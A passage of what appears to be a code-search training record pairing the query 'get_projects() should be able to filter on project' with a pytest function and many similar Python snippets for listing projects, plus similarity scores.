self.assertEqual(response.status_code, 200)\n self.assertContains(response, first_project.title)\n self.assertContains(response, first_project.description)\n self.assertContains(response, second_project.title)\n self.assertContains(response, second_project.description)", "def test_show_project_list(self):\n fake_project = FakeResource(1)\n\n # This mocks is faking keystone retrieving a defined list of\n # projects\n patch('identity.views.Keystone.project_list',\n Mock(return_value=[fake_project])).start()\n\n render_mock = patch(\n 'identity.views.ListProjectView.render_to_response').start()\n\n response = self.view(self.request)\n\n render_args = render_mock.call_args[0][0]\n computed = render_args['projects'][0]\n\n self.assertEqual(computed, fake_project.to_dict())", "def list(self, *args, **kwargs):\n projects = Project.objects.all()\n return self.list_by(projects, self.serializer_class)", "def getSubProjects(self):\n logger.debug(\"Func: getSubProjects\")\n\n return self._subProjectsList", "def projects(self):\n campaigns = self.campaigns.all()\n return Project.published_objects.filter(campaigns__in=campaigns)", "def test_returns_limit_projects(self):\n # Arrange\n # Create and arrange test projects\n self.arrange_projects()\n # Act\n response = self.client.get(\n f\"{self.url}?limit=1\", headers={\"Authorization\": self.user_session_token}\n )\n # Assert\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.json[\"results\"]), 1)", "def get_create_projects(target, proposal_ref, proposal_code='lb'):\n\n # Note that in the loader this is based on information in the PROPOSALS and VISITS files\n # TODO Multiple Visits can be defined in a file apparently - future improvement.\n # TODO NB LIne above in delete_users - redundant if using ISPYB??.\n # For the online loader it comes from the proposal_ref\n\n projects = []\n # The first word is the ISPY proposal/visit name that is used as the title of the project.\n # It can be set to OPEN in which case there are no users.\n visit = proposal_ref.split()[0]\n # If the visit is not prefixed by the proposal code\n # (typically a 2-letter sequence like \"lb\") then prefix it.\n if visit[0].isdigit():\n visit = f\"{proposal_code}{visit}\"\n project = Project.objects.get_or_create(title=visit)[0]\n projects.append(project)\n\n # If not open then delete users for the project and re-add them based on supplied fed-ids.\n delete_users(project)\n\n # Update project_id on target.\n target.project_id.add(project)\n\n # Remaining words in proposal_ref (if any) must be fedid's which are used to find users information.\n num_users = 0\n for fedid in proposal_ref.split()[1:]:\n user = User.objects.get_or_create(username=fedid, password=\"\")[0]\n project.user_id.add(user)\n num_users += 1\n if num_users == 0:\n project.open_to_public = True\n\n target.upload_progess = 10.00\n target.save()\n\n return projects", "def get_projects_route():\n response_object = {'status': 'success'}\n if request.method == 'POST':\n post_data = request.get_json()\n if post_data is not None:\n add_project(post_data)\n response_object['message'] = 'Project added!'\n else:\n response_object['projects'] = get_projects()\n return jsonify(response_object)", "def get_project_list(config):\n eggs_dir = config.get('eggs_dir', 'eggs')\n if os.path.exists(eggs_dir):\n projects = os.listdir(eggs_dir)\n else:\n projects = []\n try:\n projects += [x[0] for x in config.cp.items('settings')]\n except NoSectionError:\n pass\n return projects", "def test_get_project_list_with_no_projects(self):\n result = get_project_list()\n self.assertQuerysetEqual(result['projects'].object_list, [])\n self.assertIsNone(result['tag'])\n self.assertFalse(result['filtered'])", "def project_list(ctx, parent_project_id, output_format, columns):\n data = ctx.obj.get_projects(parent_project_id=parent_project_id)\n if output_format == 'table':\n column_names = columns.split(',')\n output_table(column_names, data['project'])\n elif output_format == 'json':\n output_json_data(data)", "def get_group_projects(groupname):\n values = admin.get_group_projects(current_app.scoped_session(), groupname)\n return jsonify({\"projects\": values})", "def get_client_projects(self, client=None):\n if type(client) is Client:\n return [p for p in self.project_list if client.client_id == p.client_id]", "def get(self, request):\n projects = Project.objects.all()\n serializer = ProjectSerializer(projects, many=True)\n return JsonResponse({'projects': [data['name'] for data in serializer.data]})", "async def get_project_info(project_urls):\n project_info = []\n for url in project_urls:\n soup = await get_page(url)\n about = soup.find_all(\"p\")\n title = soup.find(\"h3\").text\n student = about[0].text.splitlines()[2].strip()\n details = about[1].text\n name = about[0].find(\"a\").text\n project_info.append({'Organization': name, 'title': title,\n 'student': student, 'details': details,\n 'link': url})\n\n return project_info", "def getProjectsForOrgs(org_keys, limit=1000):\n q = getProjectsQueryForOrgs(org_keys)\n return q.fetch(limit)", "def test_get_project_list_with_page_filter(self):\n # Add test projects.\n projects = [\n add_project(title=str(i), description=str(i)) for i in range(10)\n ]\n pages = {\n 1: projects[5:],\n 2: projects[:5],\n }\n\n # Check first page results.\n result = get_project_list(page=1)\n first_page_results = result['projects'].object_list\n for first_page_project in pages[1]:\n self.assertTrue(first_page_project in first_page_results)\n self.assertFalse(\n any(project in first_page_results for project in pages[2]))\n\n # Check second page results.\n result = get_project_list(page=2)\n second_page_results = result['projects'].object_list\n self.assertFalse(\n any(project in second_page_results for project in pages[1]))\n for second_page_project in pages[2]:\n self.assertTrue(second_page_project in second_page_results)", "def list_namespaced_project(self, **kwargs):\n\n all_params = ['pretty', 'label_selector', 'field_selector', 'watch', 'resource_version', 'timeout_seconds']\n all_params.append('callback')\n\n params = locals()\n for key, val in iteritems(params['kwargs']):\n if key not in all_params:\n raise TypeError(\n \"Got an unexpected keyword argument '%s'\"\n \" to method list_namespaced_project\" % key\n )\n params[key] = val\n del params['kwargs']\n\n\n resource_path = '/oapi/v1/projects'.replace('{format}', 'json')\n path_params = {}\n\n query_params = {}\n if 'pretty' in params:\n query_params['pretty'] = params['pretty']\n if 'label_selector' in params:\n query_params['labelSelector'] = params['label_selector']\n if 'field_selector' in params:\n query_params['fieldSelector'] = params['field_selector']\n if 'watch' in params:\n query_params['watch'] = params['watch']\n if 'resource_version' in params:\n query_params['resourceVersion'] = params['resource_version']\n if 'timeout_seconds' in params:\n query_params['timeoutSeconds'] = params['timeout_seconds']\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.\\\n select_header_accept(['application/json', 'application/yaml'])\n if not header_params['Accept']:\n del header_params['Accept']\n\n # HTTP header `Content-Type`\n header_params['Content-Type'] = self.api_client.\\\n select_header_content_type(['*/*'])\n\n # Authentication setting\n auth_settings = []\n\n response = self.api_client.call_api(resource_path, 'GET',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='V1ProjectList',\n auth_settings=auth_settings,\n callback=params.get('callback'))\n return response", "def list(self, request):\n projects = Project.objects.all()\n\n serializer = ProjectSerializer(projects, many=True, context={'request': request}) # convert to json\n return Response(serializer.data)", "def test_get_project(self):\n pass" ]
[ "0.8439259", "0.8330137", "0.81635183", "0.790544", "0.7656669", "0.7634909", "0.7559611", "0.7557729", "0.7551785", "0.7523433", "0.7494402", "0.7446309", "0.74364996", "0.7427242", "0.73962003", "0.7385047", "0.73531884", "0.7350818", "0.73503566", "0.7344059", "0.7321423", "0.7311092", "0.73055935", "0.7295584", "0.7294882", "0.7290948", "0.72558933", "0.7221671", "0.72190756", "0.719097", "0.7174291", "0.71686316", "0.71590555", "0.7155045", "0.7155045", "0.7121004", "0.71115196", "0.7109773", "0.71041244", "0.7068838", "0.7054094", "0.70132554", "0.6994621", "0.69943553", "0.69558734", "0.6927423", "0.69193584", "0.69176495", "0.6908577", "0.68975335", "0.6877014", "0.68387467", "0.6833768", "0.682744", "0.6807972", "0.6786737", "0.67476255", "0.6736512", "0.6735734", "0.67298216", "0.6716762", "0.67050457", "0.6697824", "0.66905236", "0.66652894", "0.6663583", "0.6646426", "0.6640717", "0.66354424", "0.6624113", "0.66241014", "0.66200215", "0.65839833", "0.658229", "0.65745354", "0.65658605", "0.6561446", "0.6554841", "0.653005", "0.6516381", "0.65155864", "0.6506242", "0.6504421", "0.6492944", "0.6491935", "0.64887846", "0.6452931", "0.6444837", "0.6425635", "0.64224404", "0.6404767", "0.6395213", "0.6381957", "0.6373191", "0.63585657", "0.63572675", "0.6340091", "0.6311536", "0.6301373", "0.6299453" ]
0.862502
0
fetchet.get_projects() should be able to filter on project.
def test_get_projects_filters(fc: fetcher.Fetcher, test_project_name): projects = fc.get_projects(test_project_name) assert isinstance(projects, list) assert len(projects) == 1 assert projects[0].name == test_project_name
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_get_projects(self):\n pass", "def test_list_project_request(self):\n pass", "def test_list_projects(self):\n pass", "def test_list_projects(self):\n pass", "def test_get_projects_returns_projects(fc: fetcher.Fetcher):\n projects = fc.get_projects()\n assert isinstance(projects, list)\n assert isinstance(projects[0], models.Project)", "def test_get_project_list_with_projects(self):\n # Add two test projects.\n projects = [\n add_project(title='1', description='1'),\n add_project(title='2', description='2'),\n ]\n\n result = get_project_list()\n result_projects = result['projects'].object_list\n\n # Make sure two test projects are retrieved.\n for project in projects:\n self.assertTrue(project in result_projects)\n self.assertEqual(len(result_projects), len(projects))\n self.assertIsNone(result['tag'])\n self.assertFalse(result['filtered'])", "def get_projects():\n return Project.query.all()", "def _get_filtered_projects(filters):\n projects_itr = (projects_lib.get_filtered(f) for f in filters)\n return itertools.chain.from_iterable(projects_itr)", "def test_list_project(self):\n pass", "def filter_projects():\n with open('../results/01.crawling/01.project_ci_services.json', 'r') as infile:\n projects = json.load(infile)\n tr_projects = []\n for project, value in projects.items():\n if \"GitHub\" in value or \"Travis\" in value:\n tr_projects.append(project)\n return tr_projects", "def get_projects(self, *criterion):\n from wkcdd.models.helpers import get_project_list\n return get_project_list([self.id], *criterion)", "def test_get_project_list_with_tag_filter(self):\n # Add test projects.\n tag = 'tag1'\n projects_with_tag = [\n add_project(title='1', description='1', tags=[tag]),\n add_project(title='2', description='2', tags=[tag]),\n ]\n project_without_tag = add_project(title='3', description='3', tags=[])\n\n result = get_project_list(tag=tag)\n result_projects = result['projects'].object_list\n\n # Make sure only projects with tag are retrieved.\n for project_with_tag in projects_with_tag:\n self.assertTrue(project_with_tag in result_projects)\n self.assertFalse(project_without_tag in result_projects)\n self.assertEqual(len(result_projects), len(projects_with_tag))\n self.assertTrue(result['filtered'])\n self.assertEqual(result['tag'], tag)", "def _get_projects(project_ids):\n if _ALL in project_ids:\n return projects_lib.get_all()\n return projects_lib.get_selective(project_ids)", "def selectable_projects():\n\n db = current.db\n s3db = current.s3db\n\n # Lookup projects with provider self-registration\n ptable = s3db.project_project\n ttable = s3db.project_project_tag\n join = ttable.on((ttable.project_id == ptable.id) & \\\n (ttable.tag == \"APPLY\") & \\\n (ttable.value == \"Y\") & \\\n (ttable.deleted == False))\n query = (ptable.deleted == False)\n rows = db(query).select(ptable.id,\n ptable.name,\n join = join,\n )\n projects = {row.id: row.name for row in rows}\n return projects", "def test_get_project_list_with_no_projects(self):\n result = get_project_list()\n self.assertQuerysetEqual(result['projects'].object_list, [])\n self.assertIsNone(result['tag'])\n self.assertFalse(result['filtered'])", "def _get_projects(filters):\n # First order the objects, so separate that out\n orders_query = [o for o in filters if o['type']=='order']\n # Filter objects next, so separate those out\n filters_query = [f for f in filters if f['type']=='filter']\n\n projects = Project.objects.all()\n # We need a dictonary to pass to Django's filter function\n query_dict = {}\n # Order the projects based on the ordering queries\n for orders in orders_query:\n projects = projects.order_by(orders['property'])\n # create the dictonary based on the filtering queries\n for filters in filters_query:\n # First, if we want to filter by user, find the user\n if filters['property'] =='user':\n try:\n user_p = UserProfile.objects.get(email=filters['value'])\n query_dict[filters['property']] = user_p\n except UserProfile.DoesNotExist:\n raise Http404(\"User does not exist\")\n # Second, if the filter is by tags, change the query phrase\n # to 'tags__tag_name' - this is because tags is a ManyToManyField\n # and we want to search by the tag_name property of Tag objects\n elif filters['property'] == 'tags':\n filters['property'] = 'tags__tag_name'\n query_dict[filters['property']] = filters['value']\n else:\n # Make a dictionary, property: value, and you can pass it to filter fn\n query_dict[filters['property']] = filters['value']\n projects = projects.filter(**query_dict)\n return projects", "def query_projects(request):\n try:\n filters = request.data\n except AttributeError:\n filters = FILTER\n projects = _get_projects(filters)\n projects_as_json = serializers.serialize('json', projects)\n return HttpResponse(json.dumps(projects_as_json), content_type='json')", "def get_projects(self):\n projects = []\n page = 1\n while not len(projects) % 100:\n projects += self._get('/projects?{0}'.format(urllib.urlencode({'per_page': 100, 'page': page})))\n if not projects:\n break\n page += 1\n return projects", "def test_get_current(self, rf, projects):\n # get queryset\n request = rf.get(\"/projects/my\")\n view = MyProjectListView()\n view.setup(request)\n view.dispatch(request)\n view.get_queryset()\n qs = view.get_current()\n\n # slavic working group grant ended so it is \"past\"\n assert projects[\"derrida\"] in qs\n assert projects[\"pliny\"] in qs\n assert projects[\"ocampo\"] in qs\n assert projects[\"slavic\"] not in qs", "def test_get_projects_expanded(self):\n pass", "def projects(self, request, pk=None):\n\n obj = self.get_object()\n try:\n query = models.Project.objects.filter(\n subject=obj.subject,\n assign=obj\n )\n serializer = self.get_serializer(query, many=True)\n\n id = self.request.query_params.get('id')\n\n if id:\n query = get_object_or_404(\n models.Project,\n id=id,\n assign=obj\n )\n return self.filtering(request, query)\n\n return Response(serializer.data)\n except:\n raise except_handler.ActionDecor()", "def get_all_projects(self, org):\n return [proj for proj in Project.objects.filter(org=org)]", "def get_projects(self):\n return conf.projects", "def projects(request):\n return Project.objects.prefetch_related('task_set').filter(user=request.user)", "def projects(self):\r\n return p.Projects(self)", "def test_get_project_list_with_page_filter(self):\n # Add test projects.\n projects = [\n add_project(title=str(i), description=str(i)) for i in range(10)\n ]\n pages = {\n 1: projects[5:],\n 2: projects[:5],\n }\n\n # Check first page results.\n result = get_project_list(page=1)\n first_page_results = result['projects'].object_list\n for first_page_project in pages[1]:\n self.assertTrue(first_page_project in first_page_results)\n self.assertFalse(\n any(project in first_page_results for project in pages[2]))\n\n # Check second page results.\n result = get_project_list(page=2)\n second_page_results = result['projects'].object_list\n self.assertFalse(\n any(project in second_page_results for project in pages[1]))\n for second_page_project in pages[2]:\n self.assertTrue(second_page_project in second_page_results)", "def open_projects(request):\n return Project.objects.prefetch_related('task_set').filter(user=request.user, open=True)", "def get_projects(selection):\n project=[]\n\n # project with keyname\n\n if 'project' in selection.facets:\n project+=selection.facets['project']\n\n\n # project without keyname\n\n # WARNING\n #\n # The code below uses sdinference and query the database to retrieve ESGF parameters.\n # Doing those things here may raise circular dependencies\n # as well as making the whole thing very complex.\n #\n # We do this to make this syntax work (i.e. project value without key)\n # synda search GeoMIP\n #\n # Note that this syntax always works (i.e. load the project level default file), even without this code.\n # synda search project=GeoMIP\n #\n #\n pending_projects=sdearlystreamutils.get_facet_values_early([selection.facets],'project',extract_item=True) # project without keyname or project as part of an identifier.\n\n li=pending_projects+project\n\n li=list(set(li)) # remove duplicate\n\n return li", "def _get_projects(current_project_name):\n projects = []\n\n unique_project_changes = Change.objects.order_by().values(\n 'project_name').distinct()\n for change in unique_project_changes:\n projects.append(change['project_name'])\n\n # sort alphabetically\n projects.sort()\n\n # insert 'all' option as it should be present always\n projects.insert(0, PROJECT_ALL)\n\n # if current_project_name is valid, make it the first element in list so\n # that it shows up as selected in project choice drop down\n if current_project_name != PROJECT_ALL and current_project_name in projects:\n projects.remove(current_project_name)\n projects.insert(0, current_project_name)\n elif current_project_name != PROJECT_ALL:\n logging.error(\"Currently selected project %s not found in any changes.\"\n \" Removing from list.\", current_project_name)\n logging.debug(\"Returning list of projects: %r\", projects)\n return projects", "def test_get_project(self):\n pass", "def get_projects(self):\n res = self.conn.cursor().execute(\"SELECT * FROM projects\")\n return res.fetchall()", "def test_projects_get(self):\n response = self.client.open('/project-tracker/projects',\n method='GET')\n self.assert200(response, \"Response body is : \" + response.data.decode('utf-8'))", "def active_projects(self):\n return self.projects.filter(active=True)", "def get_projects(self):\n rps = self.start_date\n\n return Project.objects.filter(\n Q(active=True)\n & Q(\n Q(start_date__lte=rps)\n | Q(\n Q(start_date__gte=rps)\n & Q(start_date__lte=datetime.datetime.now().date())\n )\n | Q(start_date__isnull=True)\n )\n & Q(\n Q(end_date__gte=rps)\n | Q(end_date__isnull=True)\n )\n )", "def get_projects(self, _is_simple=False):\n req_url = f\"{self.url}/projects\"\n if _is_simple:\n req_url += \"?simple=true\"\n ret = requests.get(req_url, headers = self.req_header)\n return ret.json()", "def list_projects(ctx):\n pprint(ctx.obj.groups.get().data)", "def request_project_list(event_id):\n is_moar = bool(request.args.get('moar', type=bool))\n host_url = request.host_url\n return get_project_list(event_id, host_url, is_moar)", "def test_get_past(self, rf, projects):\n # get queryset\n request = rf.get(\"/projects/my\")\n view = MyProjectListView()\n view.setup(request)\n view.dispatch(request)\n view.get_queryset()\n qs = view.get_past()\n\n # slavic working group grant ended so it is \"past\"\n assert projects[\"slavic\"] in qs\n assert projects[\"derrida\"] not in qs\n assert projects[\"pliny\"] not in qs\n assert projects[\"ocampo\"] not in qs", "def project_view(request, project_id):\n\n # Retrieve the project to to be displayed. Raise an error if this project does not exist\n project = get_object_or_404(Projet, id=project_id)\n\n if request.method == 'GET':\n\n filters = Q()\n list_of_key = []\n query_string = request.META['QUERY_STRING']\n query_tab = query_string.split('&')\n filter_id_tab = []\n filter_dic = {}\n\n print(query_tab)\n\n if (query_tab != ['']):\n for query in query_tab:\n query_arg = query.split('=')\n id = query_arg[0]\n\n if not (id in filter_id_tab):\n filter_id_tab.append(id)\n try:\n filter_dic[id].append(query_arg[1])\n except KeyError:\n filter_dic[id] = [query_arg[1]]\n\n for key in request.GET:\n list_of_key.append(key)\n\n print(list_of_key)\n filters = creat_filters_rec(project, filter_dic, filter_id_tab)\n else:\n filters = Q()\n\n #\n # for key in filter_id_tab:\n #\n #\n # entry = filter_dic[key]\n #\n # if (len(entry) != 3):\n # continue\n #\n # filters = add_filter(filters, entry)\n\n tasks = project.task_set.filter(filters).order_by('-priority')\n else:\n # Retrieve all the task of the project and order them\n tasks = project.task_set.all().order_by('-priority')\n\n # Check if the logged in user is allowed to see this project\n if request.user.has_perm('taskmanager.{}_project_permission'.format(project.id)):\n status = Status.objects.all()\n users = project.members.all()\n return render(request, 'project.html', locals())\n else:\n return redirect(\"projects\")", "def get_projects(self):\n return self.http_call(\"get\", url=f\"{self.base_url}/projects\").json()", "def get_queryset(self):\r\n username = self.kwargs['username']\r\n return models.Projects.objects.filter(username = username).order_by('-id')", "def filter_projects(project_services):\n return [project for project, services in project_services.items() if \"Travis\" in services or \"GitHub\" in services]", "def get_public_projects_query():\n return Q(access_policy=AccessPolicy.OPEN)", "def get_project_list(self, dummy_project):\n # TODO: domain scope 403 is probably to do with faulty keystone policy config -- revise?\n if not self._projects:\n self._projects = self._get_keystone_client(dummy_project).projects.list()\n\n return self._projects", "def db_projects():\n return [{\"name\": \"IT\"}, {\"name\": \"Financial\"}, {\"name\": \"Failed\"}]", "def get_projects():\n if current_user.get_id() is None:\n return\n with database.engine.begin() as connection:\n result = connection.execute(select(\n [models.projects.c.project_id, models.projects.c.name, models.projects.c.path, models.projects.c.creation_date, models.projects.c.user_id, func.count(models.objects.c.object_id).label('object_count')])\n .select_from(models.projects.outerjoin(models.objects))\n .where(and_(models.projects.c.active == True, models.projects.c.user_id == current_user.id))\n .group_by(models.projects.c.project_id)\n .order_by(models.projects.c.project_id))\n projects = [dict(row) for row in result]\n for project in projects:\n user = models.User.query.filter_by(\n id=project['user_id']).first()\n if user:\n project['email'] = user.email\n return projects", "def projects(request):\n projects = (\n Project.objects.visible()\n .visible_for(request.user)\n .prefetch_related(\"latest_translation__user\")\n .order_by(\"name\")\n )\n\n if not projects:\n return render(request, \"no_projects.html\", {\"title\": \"Projects\"})\n\n return render(\n request,\n \"projects/projects.html\",\n {\"projects\": projects, \"top_instances\": projects.get_top_instances()},\n )", "def projects_view(request):\n\n # The projects to be displayed. Only the ones in which the logged in user is involved\n projects = request.user.projets.all().order_by('name')\n return render(request, 'projects.html', locals())", "def list_projects():\n if '.wcscanner' not in os.listdir(context.__BASE_PATH__):\n return []\n return os.listdir(context.__PROJECTS_PATH__)", "def get_projects(self):\n session = self.session_factory()\n results = [row.project for row in session.query(PipelineRun.project.distinct().label('project')).all()]\n session.close()\n return results", "def filter_queryset(self, request, queryset, view):\n user = request.user\n project_id = view.kwargs.get(view.lookup_field)\n\n if user.is_anonymous:\n return queryset.filter(Q(shared=True))\n\n if project_id:\n int_or_parse_error(\n project_id,\n \"Invalid value for project_id. It must be a positive integer.\",\n )\n\n # check if project is public and return it\n try:\n project = queryset.get(id=project_id)\n except ObjectDoesNotExist as non_existent_object:\n raise Http404 from non_existent_object\n\n if project.shared:\n return queryset.filter(Q(id=project_id))\n\n return super().filter_queryset(request, queryset, view)", "def project_filter(filename):\n return 'projects' in filename", "def get_projects(self):\n response = self.request(verb=requests.get, address=\"projects\")\n # FIXME: if no results, must we raise an exception?\n return response[\"results\"] if \"results\" in response else response", "def _get_resource_projects(resource):\n resource_type = resource.get('type', '').upper()\n resource_values = resource.get('include', tuple())\n\n projects = tuple()\n if resource_type == _FOLDER:\n projects = _get_folder_projects(resource_values)\n elif resource_type == _PROJECT:\n projects = _get_projects(resource_values)\n elif resource_type == _FILTER:\n projects = _get_filtered_projects(resource_values)\n else:\n logging.info('Projects: No projects for resource %s', resource_type)\n return projects", "def test_get_projects(self):\n for project in ['TEST', 'NEWTEST', 'MYPROJECT']:\n self.db.insert_single_result(generate_mock_result(project=project))\n projects = self.db.get_projects()\n self.assertItemsEqual(['MYPROJECT', 'NEWTEST', 'TEST'], projects)", "def list(self, request, *args, **kwargs):\n project = Project.objects.get(id=kwargs[\"projects_pk\"])\n self.check_object_permissions(request, project)\n return super().list(request, args, kwargs)", "def get_queryset(self):\n path_issue = str(self.request.path).split(\"/projects/\")[1]\n projects_pk = int(path_issue.split(\"/\")[0])\n\n return Contributor.objects.filter(project=projects_pk)", "def get_client_projects(self, client=None):\n if type(client) is Client:\n return [p for p in self.project_list if client.client_id == p.client_id]", "def test_show_project_list(self):\n fake_project = FakeResource(1)\n\n # This mocks is faking keystone retrieving a defined list of\n # projects\n patch('identity.views.Keystone.project_list',\n Mock(return_value=[fake_project])).start()\n\n render_mock = patch(\n 'identity.views.ListProjectView.render_to_response').start()\n\n response = self.view(self.request)\n\n render_args = render_mock.call_args[0][0]\n computed = render_args['projects'][0]\n\n self.assertEqual(computed, fake_project.to_dict())", "def filter_projects(self, query, check=True):\n page_projects = self._page_projects()\n\n page_projects.field_filter_projects.value = query\n page_projects.button_filter_projects.click()\n\n if check:\n\n def check_rows():\n is_present = False\n for row in page_projects.table_projects.rows:\n if not (row.is_present and\n query in row.link_project.value):\n break\n is_present = True\n\n return waiter.expect_that(is_present, equal_to(True))\n\n waiter.wait(check_rows,\n timeout_seconds=10,\n sleep_seconds=0.1)", "def _page_projects(self):\n return self._open(self.app.page_projects)", "def do_projects(self, arg):\n args = shlex.split(arg)\n limit = 10\n from_date = to_date = ''\n if args:\n limit = 0\n try:\n from_date, to_date = helpers.parse_date_parameters(args)\n except ValueError, msg:\n print(msg)\n return\n projects = self.db.get_projects_with_activity_field(\n from_date, to_date, limit=limit)\n refined = map(lambda x: [\n x['pid'], x['name'],\n '[Active]' if x['active'] else '[closed]',\n datetime.datetime.strftime(x['created'], '%c').decode('utf8'),\n x['description']], projects)\n print(tabulate(refined, ['ID', 'Project', 'Activity', 'Created',\n 'Description']))", "def find_projects(self, project_name: Optional[str] = None) -> List[Project]:\n with self.table_access_condition:\n conn = self._get_connection()\n c = conn.cursor()\n c.execute(\n \"\"\"\n SELECT * from projects\n WHERE (?1 IS NULL OR project_name = ?1)\n \"\"\",\n (project_name,),\n )\n rows = c.fetchall()\n return [\n Project(self, str(r[\"project_id\"]), row=r, _used_new_call=True)\n for r in rows\n ]", "def projects_with_tag(request, tag):\n return tag.project_set.filter(user=request.user)", "def list_projects():\n with BMI(_username, _password, constants.BMI_ADMIN_PROJECT) as bmi:\n ret = bmi.list_projects()\n if ret[constants.STATUS_CODE_KEY] == 200:\n table = PrettyTable(\n field_names=[\"Id\", \"Name\", \"Provision Network\"])\n projects = ret[constants.RETURN_VALUE_KEY]\n for project in projects:\n table.add_row(project)\n click.echo(table.get_string())\n else:\n click.echo(ret[constants.MESSAGE_KEY])", "def getprojects(self):\n resp = self.conn.request('GET', self.URLS['allprojects'], dict(api_key=self.api_key))\n data = resp.data.decode('utf-8')\n jdata = json.loads(data)['projects']\n # Convert nested JSON documents\n for project_index in range(len(jdata)):\n for field in ('options_json', 'templates_json'):\n jdata[project_index][field] = json.loads(jdata[project_index][field])\n # Pass project details dictionaries to constructors, return array\n return [PhProject(self, project) for project in jdata]", "def project_list(self):\n try:\n ids = self.request[api.DATA][api.DATA][\"ids\"]\n return self._get_keystone_projects(ids)\n except Exception as e:\n LOG.exception(\"Error occurred: %s\" % e)", "def get_projects(self):\n unaligned_path = self.get_unaligned_path()\n logger.debug(\"collecting list of projects\")\n return [p for p in os.listdir(unaligned_path)\n if len(parsing.get_project_label(p))]", "def all(cls):\n projects_url = 'https://www.pivotaltracker.com/services/v5/projects'\n root = _perform_pivotal_get(projects_url)\n if root is not None:\n return [Project.from_json(project_node) for project_node in root]", "def list_projects():\n\n cmd = dict()\n cmd[\"type_\"] = \"list_projects\"\n cmd[\"name_\"] = \"\"\n \n s = comm.send_and_receive_socket(cmd)\n\n msg = comm.recv_string(s)\n\n if msg != \"Success!\":\n raise Exception(msg)\n \n json_str = comm.recv_string(s) \n \n s.close() \n\n return json.loads(json_str)[\"projects\"]", "def test_get_queryset(self, rf, projects):\n request = rf.get(\"/projects/my\")\n view = MyProjectListView()\n view.setup(request)\n view.dispatch(request)\n qs = view.get_queryset()\n\n # should be ordered by newest grant\n assert qs[0] == projects[\"derrida\"] # RPG started 1yr ago\n assert qs[1] == projects[\"pliny\"] # started 400 days ago\n assert qs[2] == projects[\"ocampo\"] # started 450 days ago\n assert qs[3] == projects[\"slavic\"] # seed grant 2yrs ago", "def projects(self):\n campaigns = self.campaigns.all()\n return Project.published_objects.filter(campaigns__in=campaigns)", "def get_projects(cls):\n projects = []\n for project in Project.select():\n project_dict = {\n \"id\": project.id,\n \"title\": project.title,\n \"link\": project.link,\n \"description\": project.description\n }\n projects.append(project_dict)\n return projects", "def get_queryset(self):\n queryset = Project.objects.filter(contributor__user=self.request.user.pk)\n return queryset", "def list(self, *args, **kwargs):\n projects = Project.objects.all()\n return self.list_by(projects, self.serializer_class)", "def do_project_list(cs, args):\n _, projects = cs.projects.list()\n fields = [\n 'project_id',\n 'name',\n 'owner_id',\n 'current_user_role_id',\n 'repo_count',\n 'creation_time',\n 'public',\n ]\n utils.print_list(projects, fields, formatters={}, sortby=args.sortby)", "def getSubProjects(self):\n logger.debug(\"Func: getSubProjects\")\n\n return self._subProjectsList", "def test_read_project(self):\n pass", "def test_read_project(self):\n pass", "def test_project_list_with_projects(self):\n # Add test projects.\n first_project = add_project(title='Title 1', description='Description 1')\n second_project = add_project(title='Title 2', description='Description 2')\n\n # Check that project list contains test projects.\n response = self.client.get(reverse('portfolio:project_list'))\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, first_project.title)\n self.assertContains(response, first_project.description)\n self.assertContains(response, second_project.title)\n self.assertContains(response, second_project.description)", "def get_project(self, project):\n return Dict(self.projects.get_entry(pk=project, _fields=[\"_all\"]).result())", "def get_all_projects():\n return jsonify(admin.get_all_projects(current_app.scoped_session()))", "def get_projects():\n data = sql.list_projects()\n names = [(d['id'], d['name']) for d in data]\n return names", "def test_returns_all_projects_if_difficulty_set_to_all(self):\n # Arrange\n self.test_project_2.private = False\n # Set difficulty of test_project_2 to easy.\n self.test_project_2.difficulty = ProjectDifficulty.EASY.value\n self.test_project_2.save()\n self.test_project_1.difficulty = ProjectDifficulty.MODERATE.value\n self.test_project_1.save()\n test_project_4 = Project.clone(self.test_project_2.id, self.test_author.id)\n test_project_4.status = ProjectStatus.PUBLISHED.value\n test_project_4.difficulty = ProjectDifficulty.CHALLENGING.value\n test_project_4.save()\n # Act\n response = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"difficulty\": \"ALL\"},\n )\n # Assert\n self.assertEqual(response.status_code, 200)\n # User is only permitted for test_project 1, 2 and 4, since test_project_3 is DRAFT.\n self.assertEqual(len(response.json[\"results\"]), 3)\n self.assertNotIn(\n self.test_project_3.id, [i[\"projectId\"] for i in response.json[\"results\"]]\n )", "def project_list(ctx, parent_project_id, output_format, columns):\n data = ctx.obj.get_projects(parent_project_id=parent_project_id)\n if output_format == 'table':\n column_names = columns.split(',')\n output_table(column_names, data['project'])\n elif output_format == 'json':\n output_json_data(data)", "def get_created_projects(self):\n project_ouessant1 = Project.objects.get(name='Ouessant Tidal Power Phase I')\n project_ouessant2 = Project.objects.get(name='Ouessant Tidal Power Phase II')\n project_liaoning = Project.objects.get(\n name='Liaoning Linghai China Resource Power Wind Power Wind Farm'\n )\n return [project_ouessant1, project_ouessant2, project_liaoning]", "def open_projects_user(user):\n return Project.objects.prefetch_related('task_set').filter(user=user, open=True)", "def get_project(self, i):\r\n return self.__projects[i]", "def get_project(abort_not_found=True, **project_filters):\n return get_resource(\n Project.query.filter_by(**project_filters), abort_not_found)", "def list_projects(arn=None, nextToken=None):\n pass", "def projects():\n response = jsonify(projects_service.get_top_level_projects_ids())\n return response", "def list_(ctx, search, backend):\n projects = ctx.obj['projects_db'].search(search, backend=backend)\n projects = sorted(projects, key=lambda project: project.name.lower())\n ctx.obj['view'].search_results(projects)", "def test_search_project(self):\n title = Project.search_project(\"dee\")\n self.assertTrue(len(title) > 0)", "def project_show(ctx, args):\n for project_id in args:\n data = ctx.obj.get_project_by_project_id(project_id)\n output_json_data(data)", "def get_projects(self):\n return self.jira.projects()", "def get_projects_data():\n wcscanner_path = context.__BASE_PATH__ + '/.wcscanner'\n\n data = []\n for project in os.listdir(wcscanner_path):\n if (os.path.isdir(os.path.join(wcscanner_path, project))):\n update_project_data(project)\n project_path = '{}/{}'.format(wcscanner_path, project)\n f = open('{}/.project'.format(project_path), 'r')\n data.append(json.load(f))\n f.close()\n return data", "def getProjects(self):\n catalog = 